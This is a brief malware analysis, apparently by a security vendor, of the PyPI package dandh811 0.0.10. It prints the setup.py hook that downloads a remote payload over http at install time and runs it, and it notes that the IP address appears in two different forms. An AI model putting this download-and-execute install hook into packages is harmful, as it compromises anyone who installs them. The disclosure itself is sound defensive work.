Our static analysis module flagged package dandh811==0.0.10 as suspicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.
Our technology-generated report shows that the package
- homepage redirects to injection.vip,
subprocess APIs in setup.py
As setup.py contains the code that is executed immediately upon installation of a package, it is clear that the package trying to download a malicious payload from a remote server.
handler = urllib2.urlopen("http://126.96.36.199/sectest/package/pypi/download") with open("/tmp/dandh811.py", "wb") as fp: fp.write(handler.read()) subprocess.call(["python2", "/tmp/dandh811.py"])
Fig 1 above shows an excerpt from setup.py file. As seen, it first downloads a malicious payload
sectest/package/pypi/download over insecure http channel. The payload is saved as
/tmp/dandh811.py and executed it as a background process during the installation process.
We tried downloading the payload manually from
188.8.131.52, but the server was not reachable. ipinfo.io shows that this server is located in China.
We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.